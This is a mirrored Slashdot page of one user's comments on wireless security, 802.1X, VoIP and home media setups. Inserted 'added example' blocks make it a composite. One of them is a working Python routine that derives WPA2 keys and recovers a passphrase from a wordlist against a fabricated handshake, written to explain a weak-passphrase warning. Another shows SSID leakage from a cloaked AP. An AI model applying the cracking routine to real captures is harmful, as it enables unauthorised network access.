Slashdot Mirror


User: RedLeg

RedLeg's activity in the archive.

Stories
0
Comments
128

Comments · 128

  1. Taint anywhere NEAR that simple... on Does Your Company Use a PKI Solution? · · Score: 4, Informative

    You seem to be asking several questions, or confusing several solutions, or both.

    If you're looking for port-level authentication on your networks, wired or wireless, then IEEE 802.1X is the answer.

    (dot)1X uses EAP (Extensible Authentication Protocol) Methods. MS gives you two big methods out of the box w/ the XP client: PEAP-MS-CHAPv2 (think: login/passwd) and EAP-TLS (think: digital certs), and provides the server level support in the form of certificate services, IAS (internet authentication server) and integration of both into the AD. Other methods are around, typically from other vendors (at additional cost). To implement one not supported by MS out of the box, you need client-side and server side support.

    IF (BIG IF) you have an MS infrastructure, your client machine logins are probably hanging off the domain controller, and use one of the above methods, or, can easily (and transparently to your users) move to one.

    NOW, once either one is in place, implementing port level auth is straightforward.... unless you do not have 100% XP clients. Nobody does in my experience (think: Printservers, other headless network clients). Then you get to get REALLY inventive with firewalls, vlans, switches, etc. and you can "get there". Taint gonna be easy....

    There are open solutions on the client side, even in an MS infrastructure. Google for "wpa_supplicant".

    NOW, back to your question: The MS PKI will prolly scale as well as AD itself. No better, no worse.

    This answer is deceptively simple. You have to overlay it on YOUR network, YOUR security policy, YOUR needs, YOUR level of expertise, etc.

    MS does eat their own dawgf00d in this area, and I personally know some of the architects and implementors.

    I AM NOT A MS FAN. That being said, they have (mostly) gotten this right.

    There is a book from MS Press: Deploying Secure 802.11 Wireless Networks with Microsoft® Windows, ISBN: 0-7356-1939-5, which is obviously oriented on wireless nets, but which steps you through setting all of the .1X schtuff up.

    Recommended....

    I sincerely hope this helps..

    -RED
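
    The comment above points at wpa_supplicant as the open client for the two EAP methods it names. The configuration below is an added example, not part of the comment and not taken from the wpa_supplicant project's own docs: a wpa_supplicant.conf for wired 802.1X with one network block per method. The identities, passwords and certificate paths are placeholders.

```conf
# Added example: wired 802.1X with wpa_supplicant, one block per EAP method.
# Start with:  wpa_supplicant -D wired -i eth0 -c /etc/wpa_supplicant/wpa_supplicant.conf
ctrl_interface=/var/run/wpa_supplicant
# wired port: nothing to scan, the link itself is the "network"
ap_scan=0
eapol_version=2

# EAP-TLS, "think: digital certs". The client proves itself with its own
# certificate; the server must present one chaining to ca_cert.
network={
    key_mgmt=IEEE8021X
    eap=TLS
    identity="alice@example.com"
    ca_cert="/etc/wpa_supplicant/ca.pem"
    client_cert="/etc/wpa_supplicant/alice.pem"
    private_key="/etc/wpa_supplicant/alice.key"
    private_key_passwd="changeme"
}

# PEAP-MSCHAPv2, "think: login/passwd". Leave this one disabled while the
# TLS block is in use; flip the disabled flags to switch methods.
network={
    disabled=1
    key_mgmt=IEEE8021X
    eap=PEAP
    identity="alice"
    password="hunter2"
    # Without ca_cert the client will run MSCHAPv2 against ANY server that
    # answers, which hands the challenge/response to a rogue RADIUS box.
    ca_cert="/etc/wpa_supplicant/ca.pem"
    phase1="peaplabel=0"
    phase2="auth=MSCHAPV2"
}
```

    The ca_cert line in the PEAP block is the one most often left out in practice; the tunnel is what protects the MSCHAPv2 exchange, and an unpinned tunnel protects nothing. The RADIUS side for either block is whatever the comment's MS IAS (or a free RADIUS server) is pointed at.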

  2. Re:CDW on Equipment Suppliers You Can Trust? · · Score: 1

    Ya know, and I know this is going to sound lame, but, in my humble opinion, it all depends on personal relationships.

    Like I pointed out, I've been doing business with the same person at CDW for almost 10 years.

    He takes care of me.

    I have no doubt, that if I punched out tomorrow, called my guy a week from now from a new company, that he would continue to take care of me. It's a personal relationship.

    The other thing to realize is that ALL business partners have hic-ups. What sets one apart from the other is how they treat their customers (US) when it happens.

    I've always been happy with the way I've been treated by my guy at CDW.

    RED

  3. CDW on Equipment Suppliers You Can Trust? · · Score: 1

    I've been doing business with them through three employers, for almost 15 years.

    And for the record, I'm talking about CDW.

    If they have it in stock, they WILL deliver, overnight if you need it that bad, and they stand behind their stuff. They have great relationships with their suppliers as well, so if you need pre-sales support, they can make that happen as well.

    We (current company) sole-source our COMPAQ stuff through them, and I do not know of a single complaint. Once you have established an account, and done some business with them, you end up with a dedicated account team. I have been dealing personally with the guy who heads our team since 1997.

    Recommended......

    -RED

  4. Recommendation: Asterisk @ Home on Solutions for Small Business VoIP? · · Score: 2, Informative
    Asterisk is more than likely the ultimate solution to your problem.

      - The bad news is that it has a VERY steep learning curve, that is unless you are expert in linux, telephony, and a few other odd disciplines, a relatively rare combination these days.

      + The good news is that you can test drive and get up and running quickly and cheaply with Asterisk @ Home..

    Google for Asterisk @ Home. D/L the CD, take a SPARE box, one that you have no residual data on ('cause it's going to get zorched), insert the CD and follow the prompts. About an hour later, you will have an installed and (mostly) configured PBX with a web management GUI and a huge support community.

    Believe it or not, you can install it in VMware and get a good feel for the functionality without sacrificing a box or boxen to the PBX gods.

    The project is extraordinarily well documented, and the only additional things you absolutely need to get started playing around are a soft phone (or an IP phone, or an ATA and an analog phone) and a Freeworld Dialup (no charge) account. A cheapass PCI card to connect to a single POTS line will run around $10 on E-pay.

    All of this will take no more than a couple of hours, and you should be able to get a really good idea of what Asterisk is capable of doing.

    Once you've convinced yourself (and your colleagues), you have some choices, namely, build it yourself or buy. I can't offer advice here.....

    Some other potentially useful info-tidbits:

    • IP Phones are readily available starting at around $45US a set for cheapies (new, but low frills and crappy docco), up to several hundred a set for top-o-the-line units from folks like Cisco. I would personally recommend at least two or three for your pilot project, and not all the same model.

    • Beware the "power adaptor problem." Some VoIP phones are designed to use POE (Power over Ethernet), where the switch provides the power over the ethernet cabling just like the phone company. If the phone sets are designed for this, they may not come with power bricks, and these particular bricks can be very expensive, and add considerably to the cost of the phone set.

    • ATAs (analog telephone adaptors) let you plug a phone (or a fax, or both) into an ethernet link connected to a VoIP lashup. These are what a LOT of the commercial VoIP providers furnish or provide at low cost. There are LOTS of these available on the secondary market, and many can be unlocked to use with any provider. I'd recommend you play with a couple different ones of these as well.

    • There is a metric a$$load of information on VoIP, Asterisk and Asterisk @ Home at VoIP-Info.org. Among other things, you can find info on which phones (soft, hard and ATAs) are well supported, and config info for lots of specific models.



    Hope this helps.....

    --Red
  5. Take a look at phpWebSite on Multilingual Content Management Systems? · · Score: 2, Informative
    phpWebSite looks like it has the features you're looking for, plus it:
    • Has a nice license (GPL / LGPL)
    • Is actively maintained by someone with a budget (Appalachian State University), who also actively uses the package, so it's not likely to be abandoned, go stagnant or have unpatched security issues
    • Supports multiple languages

    Hope this helps....

    Red
  6. Re:Tomorrow -- NOT on Flurry of Security Patches · · Score: 3, Interesting

    Look at the calendar.

    Blackhat / DEFCON is at the end of the month in Vegas. This is the scheduled patch release day (at least for MS) before the event.

    The vendors have more than likely been notified by the "researchers" who discovered the issues, and are releasing their fixes on a coordinated schedule.

  7. Suggestion: Google It on FBI Conducts Feasibility Study on Project Sentinel · · Score: 2, Interesting

    Seriously:

    No one else has a hope of pulling an information indexing and retrieval project of this scale off, and they excel at exactly this kind of thing.

    Plus, there's that "First, do no evil...." motto.

    --Red

  8. Partnership.... on Searching for Quality A/V Carts? · · Score: 1

    Buy -one- of each of the top three candidates. Conduct a trial to determine which works best, and what features from the #2 and #3 you would also like.

    Now, find the local Vo-Tech and ask them if they would be interested in manufacturing a few custom carts to your specs.

  9. Some Random thoughts and Solutions... on Mid-Range Wireless Deployment for the Home User? · · Score: 1

    First, this is do-able.

    Second, What's the budget and what are the uses of this wireless LAN?

    - Budget directly influences what you CAN do, and how easily.

    - Purpose should drive the design.

    Specifically, if you are on the cheap, then the number and price of the APs, the infrastructure (interconnect, authentication servers, other....) are an issue.

    The intended use is also critical. Do you intend to open this WLAN to the world, or do you want to keep it private?

    As others have mentioned, the Linksys WRT54G series is cheap, capable, and extendible, both in terms of firmware (to modify and extend the capability and security), hardware (external higher gain and/or directional antennas), enclosures (for outdoor deployment) and community, i.e. lotsa hax0rs are doing neat things with them.

    Now, as far as range, I personally know of a major chain of truckstops in the US providing wireless hotspots. Their standard (doesn't work in every case) deployment is a single (high dollar, from a large router vendor) AP with a properly positioned (read, up in the air on a pole, with Line of Sight to all potential clients) external antenna. This typically covers the parking lot of the whole truckstop, which is significantly larger than the area you're discussing. I can't think of any reason you couldn't do the same with a WRT54G and the right (non linksys) firmware and antenna(s).

    If you can't get sufficient coverage with one AP, if it's a WRT54G, grab the appropriate 3rd party firmware (there are several to choose from), read up on either MESH or WDS and buy another one or two WRT54's to link together without stringing cables between buildings.

    It will either work for you or not. If not, you haven't pissed away a lot on hardware.

    On the security front, do yourself a favor, and make sure everything you deploy is capable of supporting WPA2 (the marketing name for IEEE 802.11i). You want AES (CCMP) as your cipher and IEEE 802.1X authentication back to an authentication server, but you may not be able to get there (software and driver wise) for a few months yet. Make sure any hardware you buy is capable. Authentication Server usually means RADIUS, and you can slay this dragon with MS IAS (if you have a windows server), or any of several free RADIUS servers on unix or winderz.

    If you run TKIP or CCMP with preshared keys (WPA personal, or passphrase authentication), choose your passphrase carefully, lest you be subject to an off-line dictionary attack on the passphrase.

    I hope this helps.....

    Red

  10. Re:Know your knife laws on Best Leatherman-Style Multitool? · · Score: 1

    Someone mod parent up....

    Seriously, if you travel via air, none of these work. If you travel, you are going to have to pack everything tool-wise, since nothing is allowed in your pockets anymore. Given that, Jensen is your friend.... That being said, there's nothing wrong with Craftsman. Visit your local Sears, and assemble a small kit. Consider including a 1/4" ratchet, sockets, and some pliers. I'd recommend a small set of vice-grip needlenose, a set of straight and curved needlenose w/ wirecutters, and a small set of snap ring pliers. A versatile bit-driver and a set of bits (flat, crosstip, hex, torx, security....) rounds it out. Not much you CAN'T work on given this, and it will all fit in a shaving kit.

    For the nit-pickers, yes, I know that the TSA lists specifics on exactly what is and is not allowed. Having printed the list out in preparation, and shown it to the agent at security, I still lost. My recommendation: give money to the EFF and don't piss on superman's cape in the mean time. John Gilmore is my hero.

    No links to the above, other than Pseudo-Google.

  11. Some Pointers: on Electronic Gadget Ideas for a New House? · · Score: 4, Informative
    Out of order:
    • First, Wireless (IEEE 802.11) IS at the state to keep HaX0rz out. I know, I was on the task group (IEEE 802.11i) that did the work. The keywords to look for in the marketplace are WPA or WPA2. Now, YOU have to turn the security on, and WEP is not the answer. At this point, I would only recommend equipment that is WPA2 (IEEE 802.11i) capable, and recommend using the AES or CCMP crypto option. TKIP works, but CCMP is the better option.
    • For the home, Since you're talking about strawbale, I'd run at least a parallel set of conduit to each wall, in each room (some rooms will need more than one pull or pair per wall, think kitchen). One should be for power, the other for "media". Pull CAT6 to the wall where you THINK you want it, pull the pull string to ALL of the others so that you, or the person you sell to down the road has max flexibility.
    • Include a wiring closet in the plans. Make sure there's enuf room for at least one full height 19" equipment rack in there. Tie ALL of the media runs to this room. Bring the cable TV, broadband network, telecom, etc into this room and distribute from there. Consider tying some of the aforementioned "media" (CAT5-6) into blocks on the wall TELCO style. This affords flexibility later.
    • Even if you ignore most of my other advice, NEVER allow a contractor to remove or not leave a pull string in a conduit run. With a conduit in place, and a pull string, you can retro-fit almost anything cheaply.
    • I personally would pull a ~2" PVC pipe from each room to the wiring closet, and outfit it with a pull string, just in case.....


    If it's not already obvious, I'm advising you to build your house as if it were flex office space.
  12. FileServer + Server Software + Players on Multi-Room Wireless Sound System? · · Score: 1
    You're basically describing my wife's Christmas present..... I went to a little bit of trouble researching this...., so hopefully you will find something in the following useful:

    FileServer: I have all of my tunes on a central server. This box's main function is to hold the files. This machine is running gentoo linux, and exports the files via samba and NFS. Anything else it does (see below) is ancillary, meaning it could be done with another entity (software or hardware). I know of others using a Linksys NSLU-2 with the "enhanced" firmware for the same purpose.

    Server Software: I'm using mt-daapd. This is an implementation of the daap protocol used by iTunes to stream the music, and the Rendezvous to publish the server location. It Just Works (tm). This currently runs on the Fileserver, but may not forever.

    Players:
    • I selected Roku Soundbridges. I like the interface, and the display. They can access the network using either 10/100 wired ethernet, or 802.11b wireless and provide analog and digital outputs to feed either powered speakers or your stereo. I have two hanging off the same server setup described above, and they work great.
    • I can also "mount" the music shared in the manner described above with iTunes. I've only tested this w/ the winderz version, as there are no Macs in the house modern enuf to run iTunes.


    What's currently missing here is the synchronized play. I also considered the Squeezebox from slim devices and decided I liked the Roku better. The Squeezebox uses Slimserver software to serve the music, and supports synchronized play. While the Roku can emulate a squeezebox and use the slimserver backend, I was not happy with the result and decided that synchronized play wasn't that important to me.

    Some other random notes:
    • The slimserver software, and a software version of their client are available free from their web page. Try before you buy, or buy one squeezebox and use the software version on laptops elsewhere.
    • Roku _might_ implement synchronized play in the future. I see no reason why they could not.
    • Roku supports "tuning" internet radio stations. I plan to set up a stream, fed by another piece of software looking at the same set of files so that I have my own internet radio station in the house. I've used jwz's gronk, which is a web-based jukebox package for this purpose before with success, but will also consider grind this time around. I do not know if I will achieve synchronization this way or not, but I'm hoping.
    • Gronk and Grind do not use ID3 tags, so when I originally ripped a lot of my music for Gronk, I didn't care about the ID3s. All of the rest of this software DOES care, so I have a bit of a mess on my hands.
    • Gronk is written in Perl, so it's hackable. This comes in handy tweaking things like sort order, whether to include "the" in the band name, etc. JWZ also provides a demo version to play with on the site below.
    • Another way to get the synchronized music, and to serve over wireless, although not the way you originally asked, is to set up an FM transmitter. I have not yet done this for this project, but my prior Gronk installation supported one of those micropowered fm transmitters intended for use with mp3 players in cars just fine.


  13. Re:If there IS a solution, let me know. on Laptops, Headless Servers and KVMs? · · Score: 1
    I was just thinking this morning how awesome it would be if I could work on all of these computers (at least on the software side) without getting out of my chair.

    You, sir, missed your calling. You should have been a UNIX sysadmin....

    Now, where ARE my sandals and suspenders, anyway?

    ObRealContent:

    But seriously, this is why real computers, at least servers, typically have serial console ability hard-wired in and drop back to it when running headless or without a keyboard. Sun has had this for YEARS, and lots of higher end x86-based server hardware supports it as well. Plus, there's been support to one degree or another in the Linux Kernel for a long time.

    So, your solution, and I know this ain't the answer you were grepping for, is to buy hardware that supports a serial console, and use an OS which supports the hardware. For all others, particularly doing installs on PCs, a KVM is about as good as it gets.
  14. Re:FCC red herring on OpenBSD Activism Shows Drivers Can Be Freed · · Score: 3, Informative
    Here's one response to the FCC issue (basically, there's higher risk if OSS vendors try to write their own firmware instead of appropriately licensed vendor-supplied firmware binaries)
    This is probably true. It's also probably irrelevant. The issue, to a LAWYER, and let's not forget that they're the ones that matter in cases like this, is compliance with the law. Atheros' Lawyers care if they comply. If YOU reverse engineer the driver and in doing so, violate the FCC regs for power, frequency, etc., that's YOUR problem, not theirs. But they are legally not allowed to abet you (by giving you programmatic access to these controls) in doing so.

    All your stuff about radio licenses, considering that we're talking about unlicensed spectrum is silly and uninformed (I used to work for a cell/ss7/tcpip vendor and we dealt with LICENSED spectrum). If you stay under certain dB/wattages (which the -hardware- will restrict you to.....
    This is just wrong. First of all, this is IEEE 802.11, not a cell phone. The radios in these chips will happily vary their power and frequencies if the driver tells them to because they are SOFTWARE CONTROLLED RADIOS, and the PHY (Physical Layer specification) for IEEE 802.11 REQUIRES them to operate this way, i.e. to vary their frequencies. The trick is that while the BAND is specified worldwide, the permitted frequencies within the band are specific to each country. Further, the allowed radiated power can also vary locally.

    I am not making this crap up, nor am I quoting from some trade rag, journal or online posting. I've spent the last several years as an active, voting participant in IEEE 802.11, sitting in the room with the engineers who design these chipsets and radios. If only one of them, from one company, had explained things this way, it would be one thing. But the reality is that this is the story from all of the mainstream chipset / radio vendors, and it's validated by the other folks in the room who specialize in regulatory issues.

  15. Re:Why NOT? on OpenBSD Activism Shows Drivers Can Be Freed · · Score: 5, Informative
    So why do companies have a problem with free driver distribution?

    A: In the case of wireless, the FCC plays a part.

    An 802.11 Wireless Card is a software controlled radio, and must be licensed per FCC regs (in the USA, your country's rules might be different). Since the 802.11 PHY operates over several channels within the specified band, it must be able to select and switch between these channels via software, and to adjust its transmit power for optimum performance based on the changes in temperature of the transmitter, and changes in the frequency, among other things.

    But different regulatory domains (countries) allow different channels within the bands, meaning a card in the US may be able to operate on a channel in the B band which is not licensed for another country, or vice versa. This is particularly true in the A band, where a whole middle "chunk" is not legal for use in the US.

    Bottom line is that in order for the producer to get a license for the radio (and trust me, you do NOT want it to be the case that you, the operator, have to secure that license), he is NOT ALLOWED to expose the controls for power, et al, to the end user.

    Now, if the driver / firmware (distinction / similarity discussed elsewhere in the thread) is open source, then by definition the controls in question are exposed to the end user. There would be nothing to prevent an end user from operating his card at a higher than legal power, or outside the legal freqs for the local regulatory domain.

    NOW, all that being said, that is not to say that SOME hardware manufacturers haven't tried to do the right thing, and strike a compromise.

    The MAD-WiFi Project http://sourceforge.net/projects/madwifi, (FAQ here) produces an open driver for the cards with Atheros chipsets. The bulk of the code is open, and under a good license. To meet the FCC requirements, they implement the "required to be secret" controls in a binary-only Hardware Abstraction Layer (HAL), but the rest of the code is open, free for you to read and modify.

    And it works. I'm typing this through a Netgear card, running the MAD-WiFi driver (with TKIP encryption, IEEE 802.11i 4-way handshake and authentication handled by wpa_supplicant) on Gentoo Linux.

    Credit is due to Sam Lefler and most importantly to Greg Chesson (of Atheros). Yes, it's that Greg Chesson, the same one mentioned of late by Rob Pike in his recent ./ interview.

    Note that, AFAICT, all of this happened without Theo de Raadt pimping around or making an ass of himself, as he is wont to do. Disclaimer: I lost patience with Theo and TheoBSD a long time ago.

  16. Re:Gronk on Centrally-Controlled Home Music System on a Budget? · · Score: 1

    Gronk rocks.... I've had it running for three or four years, and every alternative I've looked at sux.

    It's even better if you drive it from something with a touchscreen. I've used Sharp Mobilon TriPad PV-6000 for this purpose and it works really well. Yeah, it runs WinCE, but Gronk works fine with the builtin browser, and the touchscreen makes it really nice.

  17. Keeping the screw straight on Advice for a Novice Replacing Laptop Hard Drive? · · Score: 3, Informative

    Don't make it any harder than you have to...

    Take two sheets of paper, label one FRONT and the other BACK.

    With the notebook upside down, as you take a screw out, place it on the BACK piece of paper in the same relative position it came from on the bottom of the notebook. If you have to flip it and pull screws from the top side, use the other sheet of paper.

    Once you're ready to re-assemble, reverse.....

    Simple, works like a charm.....

  18. The Tech exists, check w/ Xerox on Large-Scale Paper-To-Digital Conversion? · · Score: 1

    A number of years ago, the LARGE (read beltway bandit) contracting firm I was working for landed a private contract with a major insurance firm. Said firm had been NAILed in a class action lawsuit, and as part of the resultant consent decree, had to digitize ALL of its paper policies and contracts, going back years. This averaged over 90 front-and-back pages per customer, and there were millions of customers. They had (originally) about 90 days to get it done.

    This insurance company custom built several scan assembly lines, which used automated (Xerox IIRC) scanners and document handlers, as well as lots of custom software (that we customized).

    This was more than seven years ago, so I would be surprised if the core technology isn't available at Kinkos or maybe even somewhere within your own university. Ask around, and if it's not there, call the local Xerox rep and ask to have one of the devices out on a demo. Whether the uni buys one or not, you can probably get YOUR work done, and make YOUR prof happy.

  19. Re:Advice from the Inside Track on State of Secure Wireless Networking? · · Score: 1

    There is no way that 802.11i is going to change anything about CCMP.

    I agree, it's unlikely, but possible. Sponsor ballot (and I'm a voter there, too) is NOT the final stage, so a change might come, but again, it is unlikely.

    I'm much more concerned about interoperability issues. One thing that I have learned is that if something isn't 3rd party tested, it will not interoperate. In the course of operating a commercial interoperability testing and certification program for IPSec products, we have to date, after 6 years of testing, NEVER seen a product submitted which did not require corrections in order to interoperate. This is not a comment on coding quality, FWIW. Interoperability is HARD, and far from automatic, even if there is a good standard to follow.

    Now, will I see you in the group of grumpy folks in Anaheim?

  20. Re:Advice from the Inside Track on State of Secure Wireless Networking? · · Score: 1
    I'm sure it's centrally managed, probably through a radius server. This scales just fine, as you enter a MAC once, on the central server. Imagine doing that on EACH AP individually. For extremely large deployments like your university, it's easy to see that no AP would have the internal capacity to store that many MACs, so they more or less have to do it centrally.

    You can also bet these are not consumer-grade access points like the original poster seemed to be leaning towards, but higher end units. Consumer-grade stuff is priced at around $100 US, while the enterprise class APs intended for this kind of deployment cost hundreds.

    As far as the actual data entry, it doesn't have to be a knuckle drill.... why do you think they bar code the MAC onto the NIC?

  21. Advice from the Inside Track on State of Secure Wireless Networking? · · Score: 4, Informative
    FWIW, I'm on the IEEE 802.11i standards committee that built WPA and the rest of it....


    I would recommend that you implement (now) WPA with TKIP encryption. If you're a MS shop, and have an Active Directory infrastructure, adding MS IAS (internet authentication server) to that is very easy, and you're probably already licensed. Then you get to choose between authentication methods, and MS supports (and integrates into XP) EAP-MS-CHAP and EAP-TLS, basically login/passwd and digital certs, respectively. I would avoid Preshared Secret Keys (PSKs) due to their vulnerability to off-line dictionary attacks, unless you're willing to generate the PSKs in a cryptographically sound manner and push the length out quite a bit.


    Likewise, I would counsel caution about using the AES encryption. If you purchase all of your gear from one vendor, you'll probably be OK, but there are a couple of gotchas that you need to know about. First, the IEEE 802.11i standard which specifies CCMP (the AES crypto) is not yet final. It's extremely unlikely, but it _could_ change (we meet next week). Any vendor you choose today would likely provide updates in the event of a change, but who knows. More importantly, because the 11i is not final, the Wi-Fi Alliance has not yet integrated CCMP into their testing. So not only do you have absolutely no guarantee of interoperability, no one other than the vendor has tested the crypto implementation. Most crypto folks have a good feeling about AES, but no sane cryptographer trusts an implementation that hasn't been 3rd party tested.


    Unfortunately, if you need to support Linux, you're in for a hard time. I am not aware of a complete working set of client-side "stuff" to integrate into this lashup, although I did notice the beginnings of some support in the recent 2.6.5 kernel. Do NOT assume that you will be able to get linux working in this environment right now. It's coming..... but it ain't there yet.


    Now, on the subject of some of the other "advice" offered here....

    • Disabling broadcast of SSIDs is useless. It will hinder the performance of your network, and offers no improvement to your security whatsoever. The reason for this is simple: the SSID functions as a name for the wireless LAN, to enable a client to differentiate. Think of multi-client office buildings. Now, you can disable the broadcast of the SSID on the AP(s), but that does not remove the SSID from ALL of the wireless frames. Specifically, disabling broadcast removes the SSID from the BEACON transmitted by the AP, but the SSID MUST remain in the PROBE, PROBE-RESPONSE, ASSOCIATE-REQUEST and a few others for the network to work at all. All you have done is hide from netstumbler, but not from many of the other "stumblers".
    • As far as VPNs, if you already have one, integrate it into your plan. If not, don't sweat it.
    • Make SURE you disable support of WEP. It is possible to support both WEP and WPA, but it's an extremely bad idea, and WILL lead to the compromise of your network.
    • MAC screening is not a bad idea. MACs can be spoofed, so it's not foolproof, but it does help (some). It may not scale for you depending on the number of clients you have to support.
    • Check and see if your APs support time-based access controls, and if they don't, look into placing them on "burglar timers", available inexpensively at Walmart, etc. The idea here is simple: disable access during non-business hours.


    There is a book out from Microsoft Press that gives a lot of background, and takes you step-by-step through getting all of this crap up and running in their environment. I have met the author, and know a number of the contributors from the committee. I highly recommend it, available here. I sincerely hope all of this helps....
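
    Both this comment and comment 9 above (the WRT54G thread) warn that a WPA/WPA2 passphrase is exposed to an off-line dictionary attack, and this one adds that a PSK generated "in a cryptographically sound manner" with the length pushed out is the way around it. The script below is an added example, not RedLeg's code and not taken from any tool: it builds the passphrase-to-PSK mapping, the 802.11i PRF and the message-2 MIC of the 4-way handshake, fabricates a "capture" from them, and then recovers the passphrase from a wordlist with no further contact with the AP. The MAC addresses, nonces, SSID and wordlist are all constructed for the demonstration; only the derivation steps are the standard's.

```python
"""Added example (not from the original comments): the off-line dictionary
attack on a WPA/WPA2 passphrase, and why a random 256-bit PSK defeats it.
The "capture" is fabricated locally from the same derivation; nothing is sniffed."""
import hashlib
import hmac
import secrets
import struct


def wpa_psk(passphrase: str, ssid: str) -> bytes:
    """IEEE 802.11i passphrase-to-PSK mapping: PBKDF2-HMAC-SHA1, 4096 rounds, 256 bits.
    The passphrase is the only secret input; the SSID is public and serves as the salt."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def random_psk() -> str:
    """A PSK that never came from a passphrase: 64 hex digits of CSPRNG output."""
    return secrets.token_bytes(32).hex()


def prf(key: bytes, label: bytes, data: bytes, nbits: int) -> bytes:
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i), i = 0, 1, ..."""
    out = b""
    for i in range((nbits + 159) // 160):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[: nbits // 8]


def kck(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Key Confirmation Key: first 128 bits of the PTK (PRF-384 for CCMP)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 384)[:16]


def eapol_mic(key_conf: bytes, eapol_zeroed: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): HMAC-SHA1 over the EAPOL-Key frame with
    its MIC field zeroed, truncated to 16 bytes."""
    return hmac.new(key_conf, eapol_zeroed, hashlib.sha1).digest()[:16]


def make_capture(pmk: bytes, ssid: str) -> dict:
    """Fabricate what a sniffer hands an attacker: both MACs, both nonces, message 2 of
    the 4-way handshake with the MIC field zeroed, and the MIC the client actually sent."""
    aa, spa = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")  # constructed MACs
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))                  # constructed nonces
    # EAPOL-Key body: descriptor type 2 (RSN), key info 0x010a (MIC set, pairwise, version 2),
    # key length 16, replay counter 1, SNonce, IV, RSC, ID, zeroed MIC, key data length 0
    body = struct.pack(">BHHQ32s16s8s8s16sH", 2, 0x010A, 16, 1, snonce,
                       b"\0" * 16, b"\0" * 8, b"\0" * 8, b"\0" * 16, 0)
    eapol = struct.pack(">BBH", 1, 3, len(body)) + body   # 802.1X version 1, type EAPOL-Key
    mic = eapol_mic(kck(pmk, aa, spa, anonce, snonce), eapol)
    return dict(ssid=ssid, aa=aa, spa=spa, anonce=anonce, snonce=snonce, eapol=eapol, mic=mic)


def crack(wordlist, cap: dict):
    """Off-line: one PBKDF2, one PRF and one HMAC per guess, against data already in hand."""
    for guess in wordlist:
        pmk = wpa_psk(guess, cap["ssid"])
        k = kck(pmk, cap["aa"], cap["spa"], cap["anonce"], cap["snonce"])
        if hmac.compare_digest(eapol_mic(k, cap["eapol"]), cap["mic"]):
            return guess
    return None


WORDLIST = ["123456", "password", "letmein", "wireless", "corpnet2004"]   # constructed


if __name__ == "__main__":
    weak = make_capture(wpa_psk("letmein", "corpnet"), "corpnet")
    print("weak passphrase recovered:", crack(WORDLIST, weak))
    strong = make_capture(bytes.fromhex(random_psk()), "corpnet")
    print("random 256-bit PSK recovered:", crack(WORDLIST, strong))
```

    The wpa_psk function reproduces the 802.11i Annex H test vector (passphrase "password", SSID "IEEE"), so the derivation can be checked against the standard. Note what the attacker needs: the SSID, two MACs, two nonces and one authenticated handshake message, all of which go over the air in the clear, and the whole search then runs at whatever rate the attacker's hardware manages PBKDF2. A 64-hex-digit PSK entered directly is not in any wordlist, which is the "cryptographically sound" option the comment recommends.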
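
    The first bullet above explains that "disable SSID broadcast" only blanks the SSID element in the beacon, while probe requests, probe responses and association requests still carry it. The script below is an added example, not code from the comment or from any stumbler: it hand-builds those four management frames for a cloaked AP, with a small element parser that reads the SSID back out of each. The BSSID, client MAC, SSID "CorpNet" and the element contents are constructed for the demonstration.

```python
"""Added example, not from the original comment: a hand-built 802.11 capture
showing that a cloaked beacon blanks the SSID element and nothing else.
Frames, MACs and the SSID are constructed here, not sniffed."""
import struct

IE_SSID, IE_RATES, IE_DS = 0, 1, 3                     # element IDs used below
ASSOC_REQ, PROBE_REQ, PROBE_RESP, BEACON = 0, 4, 5, 8  # management frame subtypes
# bytes of fixed fields between the 24-byte header and the first element
FIXED = {ASSOC_REQ: 4, PROBE_REQ: 0, PROBE_RESP: 12, BEACON: 12}

AP = bytes.fromhex("001122334455")    # constructed BSSID
STA = bytes.fromhex("66778899aabb")   # constructed client MAC
BCAST = b"\xff" * 6


def ie(tag: int, value: bytes) -> bytes:
    """One tagged element: ID, length, value."""
    return struct.pack("BB", tag, len(value)) + value


def mgmt(subtype: int, da: bytes, sa: bytes, bssid: bytes, fixed: bytes, ies) -> bytes:
    """Management frame: frame control (version 0, type 0, subtype), flags,
    duration, addr1..3, sequence control, then fixed fields and elements."""
    header = struct.pack("<BBH6s6s6sH", subtype << 4, 0, 0, da, sa, bssid, 0)
    return header + fixed + b"".join(ies)


def subtype_of(frame: bytes) -> int:
    return frame[0] >> 4


def ssid_of(frame: bytes):
    """SSID element of a management frame: the name, '' if the element is present
    but blank (a cloaked beacon), None if not a frame we parse or no SSID element."""
    if frame[0] & 0x0C or subtype_of(frame) not in FIXED:   # type bits must be 0 (management)
        return None
    pos = 24 + FIXED[subtype_of(frame)]
    while pos + 2 <= len(frame):
        tag, length = frame[pos], frame[pos + 1]
        value = frame[pos + 2:pos + 2 + length]
        if tag == IE_SSID:
            # some APs cloak with length 0, others with a run of NULs: both are "hidden"
            return "" if value.strip(b"\x00") == b"" else value.decode("utf-8", "replace")
        pos += 2 + length
    return None


def leaked_ssids(frames) -> set:
    """What a passive listener learns once any client talks to the cloaked AP."""
    names = set()
    for f in frames:
        if subtype_of(f) != BEACON:
            s = ssid_of(f)
            if s:
                names.add(s)
    return names


# constructed traffic: a cloaked beacon, then a client finding and joining the AP by name
RATES = ie(IE_RATES, bytes([0x82, 0x84, 0x8B, 0x96]))
DS = ie(IE_DS, b"\x06")
BEACON_FIXED = struct.pack("<QHH", 0, 100, 0x0411)   # timestamp, interval, capability (ESS, privacy)
CAPTURE = [
    mgmt(BEACON, BCAST, AP, AP, BEACON_FIXED, [ie(IE_SSID, b""), RATES, DS]),
    mgmt(PROBE_REQ, BCAST, STA, BCAST, b"", [ie(IE_SSID, b"CorpNet"), RATES]),
    mgmt(PROBE_RESP, STA, AP, AP, BEACON_FIXED, [ie(IE_SSID, b"CorpNet"), RATES, DS]),
    mgmt(ASSOC_REQ, AP, STA, AP, struct.pack("<HH", 0x0411, 10), [ie(IE_SSID, b"CorpNet"), RATES]),
]

if __name__ == "__main__":
    print("beacon SSID:", repr(ssid_of(CAPTURE[0])))
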